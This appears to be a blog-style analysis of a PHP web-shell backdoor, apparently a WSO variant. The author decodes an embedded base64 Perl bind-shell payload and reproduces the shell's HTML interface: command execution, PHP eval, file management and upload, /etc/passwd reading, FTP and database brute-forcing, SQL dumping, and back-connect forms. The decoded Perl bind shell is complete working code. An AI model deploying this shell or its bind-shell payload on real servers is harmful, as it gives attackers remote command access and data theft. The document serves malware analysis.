$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
#!/usr/bin/perl
$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
accept(CONN,S);
if(!($pid=fork)) {
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}
HTML Front-end
I wanted to see what it actually looked like, so I extracted all the echo commands out so it was almost just the HTML:
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; \r\ncharset=" . $_POST['charset'] . "'>
<title>" . $_SERVER['HTTP_HOST'] . "</title>
\r\n
<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; \r\nfont: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>
\r\n<script>\r\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t
<head>
<body>
<div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
\r\n
<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>
'
<table class=info cellpadding=3 cellspacing=0 width=100%>
<tr>
<td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>
' . '
<td>
<nobr>' . substr(@php_uname(), 0, 120) . '</nobr>
<br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . FkLptViewSize($totalSpace) . ' <span>Free:</span> ' . FkLptViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . FkLptPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '
</td>
' . '
<td width=1 align=right>
<nobr>
<select onchange="g(null,null,null,null,null,this.value)">
<optgroup label="Page charset">' . $opt_charsets . '</optgroup>
</select>
<br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '
</nobr>
</td>
</tr>
</table>
' . '
<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%>
<tr>' . $menu . '</tr>
</table>
<div style="margin:5">';
\r\n
</div>
\r\n
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
\r\n\t
<tr>
\r\n\t\t
<td>
<form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form>
</td>
\r\n\t\t
<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
\r\n\t
</tr>
<tr>
\r\n\t\t
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
\r\n\t\t
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
\r\n\t
</tr>
<tr>
\r\n\t\t
<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
\r\n\t\t
<td>
<form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form>
<br >
</td>
\r\n\t
</tr>
</table>
</div>
</body>
</html>
<h1>Server security information</h1>
<div class=content>
'<span>' . $n . ': </span>';
$v . '<br>';
'
<pre class=ml1>' . $v . '</pre>
';
<br>
<br>
<br/>
<br/><span>posix_getpwuid (\"Read\" /etc/passwd)</span>
<table>
<form onsubmit='g(null,null,\"5\",this.param1.value,this.param2.value);return false;'>
<tr>
<td>From</td>
<td><input type=text name=param1 value=0></td>
</tr>
<tr>
<td>To</td>
<td><input type=text name=param2 value=1000></td>
</tr>
</table>
<input type=submit value=\">>\"></form>
<br/>
</div>
strlen($temp), "\n", $temp;
<h1>PHP info</h1>
<div class=content>
<style>.p {color:#000;}</style>
str_replace('<h1', '<h2', $tmp) . '
</div>
<br>';
'
<h1>Execution PHP-code</h1>
<div class=content>
<form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX
</form>
<pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
htmlspecialchars(ob_get_clean());
</pre>
</div>
Can't upload file!
Can't create new dir
<h1>File manager</h1>
<div class=content>
<script>p1_=p2_=p3_=\"\";</script>
Can't open this folder!
<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
\r\n
<form name=files method=post>
<tr>
<th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th>
<th>Owner/Group</th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th>
<th>Actions</th>
</tr>
'<tr' . ($l ? ' class=l1' : '') . '>
<td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td>
<td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td>
<td>' . ($f['type'] == 'file' ? FkLptViewSize($f['size']) : $f['type']) . '</td>
<td>' . $f['modify'] . '</td>
<td>' . $f['owner'] . '/' . $f['group'] . '</td>
<td>
<a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">
' . $f['perms'] . '
</td>
<td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
<tr>
<td colspan=7>
\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t
<select name='p1'>
<option value='copy'>Copy</option>
<option value='move'>Move</option>
<option value='delete'>Delete</option>
<option value='zip'>Compress (zip)</option>
<option value='unzip' selected>Uncompress (unzip)</option>
<option value='tar'>Compress (tar.gz)</option>
<option value='paste'>Paste / Compress</option>
</select>
file name: <input type=text name=p2 value='FkLpt_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'>
<input type='submit' value='>>'>
</td>
</tr>
</form>
</table>
</div>
$_POST['p1']($_POST['p2']);
strlen($temp), "\n", $temp;
<h1>String conversions</h1>
<div class=content>
<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'>
<select name='selectTool'>
<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>
</select>
<input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br>
<textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea>
</form>
<pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>
htmlspecialchars($_POST['p1']($_POST['p2']));
</pre>
</div>
<br>
<h1>Search files:</h1>
<div class=content>
\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\">
<table cellpadding='1' cellspacing='0' width='50%'>
\r\n\t\t\t
<tr>
<td width='1%'>Text:</td>
<td><input type='text' name='text' style='width:100%'></td>
</tr>
\r\n\t\t\t
<tr>
<td>Path:</td>
<td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td>
</tr>
\r\n\t\t\t
<tr>
<td>Name:</td>
<td><input type='text' name='filename' value='*' style='width:100%'></td>
</tr>
\r\n\t\t\t
<tr>
<td></td>
<td><input type='submit' value='>>'></td>
</tr>
\r\n\t\t\t
</table>
</form>
<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>
</div>
<br>
<h1>Search for hash:</h1>
<div class=content>
\r\n\t\t
<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\r\n\t\t</form>
</div>
@fread($fp, 1024);
<h1>File tools</h1>
<div class=content>
File not exists
'<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? FkLptViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . FkLptPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
'<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
'<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
<br><br>
<pre class=ml1>
htmlspecialchars(@fread($fp, 1024));
</pre>
<div class=ml1 style=\"background-color: #e1e1e1;color:black;\">
str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '
</div>
';
Can't set permissions!<br><script>document.mf.p3.value=\"\";</script>
'<script>p3_="";</script>
<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>
';
File isn't writeable
Saved!<br><script>p3_=\"\";</script>
'
<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
htmlspecialchars(@fread($fp, 1024));
</textarea><input type=submit value=\">>\">
</form>
<table cellspacing=1 cellpadding=5 bgcolor=#222222>
<tr>
<td bgcolor=#333333>
<span style=\"font-weight: normal;\">
<pre>00000000<br></pre>
</span>
</td>
<td bgcolor=#282828>
<pre></pre>
</td>
<td bgcolor=#333333>
<pre>" . htmlspecialchars($h[2]) . '</pre>
</td>
</tr>
</table>
';
Can't rename!<br>
'
<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>
';
Fail!
Touched!
Bad time format!
'<script>p3_="";</script>
<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>
';
</div>
d.cf.cmd.value='';\n
c_='" . $GLOBALS['cwd'] . "';
d.cf.output.value+='" . $temp . "';
d.cf.output.scrollTop = d.cf.output.scrollHeight;
strlen($temp), "\n", $temp;
<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>
<h1>Console</h1>
<div class=content>
<form name=cf onsubmit=\"if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;\">
<select name=alias>
'
<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>
';
'
<option value="' . htmlspecialchars($v) . '">' . $n . '</option>
';
'
</select>
<input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>">
<nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr>
<br/>
<textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
htmlspecialchars("\$ " . $_POST['p1'] . "\n" . FkLptEx($_POST['p1']));
</textarea>
<table style=\"border:1px solid #df5;background-color:#555;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%\">
<tr>
<td width=\"1%\">\$</td>
<td><input type=text name=cmd style=\"border:0px;width:100%;\" onkeydown=\"kp(event);\"></td>
</tr>
</table>
</form>
</div>
<script>d.cf.cmd.focus();</script>
unlink error!
<h1>Suicide</h1>
<div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,'yes')\">Yes</a></div>
'
<h1>Results</h1>
<div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
'<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
'<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
'<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}
</div>
<br>
'
<h1>Bruteforce</h1>
<div class=content>
<table>
<form method=post>
<tr>
<td><span>Type</span></td>
<td>
<select name=proto>
<option value=ftp>FTP</option>
<option value=mysql>MySql</option>
<option value=pgsql>PostgreSql</option>
</select>
</td>
</tr>
<tr>
<td><input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>
' . '
<td><input type=text name=server value="127.0.0.1"></td>
</tr>
' . '
<tr>
<td><span>Brute type</span></td>
' . '
<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td>
</tr>
' . '
<tr>
<td></td>
<td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td>
</tr>
' . '
<tr>
<td></td>
<td><label><input type=radio name=type value="2"> Dictionary</label></td>
</tr>
' . '
<tr>
<td></td>
<td>
<table style="padding-left:15px">
<tr>
<td><span>Login</span></td>
' . '
<td><input type=text name=login value="root"></td>
</tr>
' . '
<tr>
<td><span>Dictionary</span></td>
' . '
<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td>
</tr>
</table>
' . '
</td>
</tr>
<tr>
<td></td>
<td><input type=submit value=">>"></td>
</tr>
</form>
</table>
';
</div>
<br>
$sql;
;\n\n
$sql;
$sql;
\r\n
<h1>Sql browser</h1>
<div class=content>
\r\n
<form name='sf' method='post' onsubmit='fs(this);'>
<table cellpadding='2' cellspacing='0'>
<tr>
\r\n
<td>Type</td>
<td>Host</td>
<td>Login</td>
<td>Password</td>
<td>Database</td>
<td></td>
</tr>
<tr>
\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n
<td>
<select name='type'>
<option value='mysql'
selected
>MySql</option>
<option value='pgsql'
selected
>PostgreSql</option>
</select>
</td>
\r\n
<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>
\r\n
<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>
\r\n
<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td>
<td>
<select name=sql_base>
<option value=''></option>
</select>
'<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
$tmp;
$tmp;
</td>
\r\n\t\t\t\t
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
\r\n
<td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
\r\n\t\t\t
</tr>
\r\n\t\t
</table>
\r\n\t\t<script>\r\n s_db='" . @addslashes($_POST['sql_base']) . "';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>
<br/>
<table width=100% cellpadding=2 cellspacing=0>
<tr>
<td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>
<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'>
</td>
<td style='border-top:2px solid #666;'>
<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">
of {$pages}
<a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< \r\nPrev</a>
<a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>
<br><br>
<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\"></table>
<tr>
'
<th>' . $key . '</th>
';
</tr>
<tr>
'
<tr class="l' . $line . '">
';
<td><i>null</i></td>
'
<td>' . nl2br(htmlspecialchars($value)) . '</td>
';
</tr>
'
<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>
';
<br>
</form>
<form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>
htmlspecialchars($_POST['p2']);
</textarea><br/><input type=submit value='Execute'>
</td></tr>
<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>
</table></form><br/>
<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>
'<br/>
<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>
';
htmlspecialchars($db->error());
</div>
<h1>Network tools</h1>
<div class=content>
\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>
<pre class=ml1>{$out}\n" . FkLptEx("ps aux | grep bp.pl") . "</pre>
<pre class=ml1>{$out}\n" . FkLptEx("ps aux | grep bc.pl") . "</pre>
</div>
Putting this in a browser (or using an HTML-to-image converter) gives us:
And now we can see at least some of the functions!
Investigation
Googling for various phrases in the code and the HTML labels returned the following further reading:
Found new backdoor script and decoded version. Have fun.
Looks like it’s a variation of the WSO backdoor.
Comments?
Feel free to comment on my LinkedIn post